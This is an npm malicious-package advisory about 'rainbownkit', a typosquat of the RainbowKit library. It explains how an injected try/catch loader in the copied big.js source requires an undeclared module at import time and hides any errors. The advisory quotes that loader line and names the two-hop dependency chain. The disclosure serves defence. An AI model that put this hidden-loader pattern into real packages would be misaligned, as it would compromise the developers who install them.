npm · Malicious package advisory
Malwarerainbownkit
MAL-2026-6340
Malicious code in rainbownkit (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (970be1fb6306ff1e8dc6119d96404f600a1eb44a47124e2910bb9237bb80fe9a)
Package 'rainbownkit' is a single-character typosquat of the popular Web3 library 'rainbowkit'. The shipped source, README, repository URL, and author metadata are copied verbatim from the unrelated 'big.js' arbitrary-precision math library — a developer installing this expecting RainbowKit instead receives big.js with an injected covert loader. The package's main entry (big.js and big.mjs, both referenced via `main` and `exports`) contains an injected try/catch around line 606 that runs at require/import time: `const doc = require("parket-slot"); doc.from_str().then(e => {}).catch(e => {})`. The 'parket-slot' module is not declared in package.json and would be pulled in transitively via the package's only declared runtime dependency 'log-taker' (`^0.0.9`), an undocumented niche package with no relation to the package's claimed purpose. All errors are silently swallowed, making the hidden execution invisible to the consumer. Anyone who runs `require('rainbownkit')` (or any code that imports it) executes whatever code the 'parket-slot' / 'log-taker' chain delivers at that moment — a classic two-hop dependency-confusion supply-chain payload combined with name impersonation of a high-traffic Web3 package.
Compromised versions (1)
- 0.0.8
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.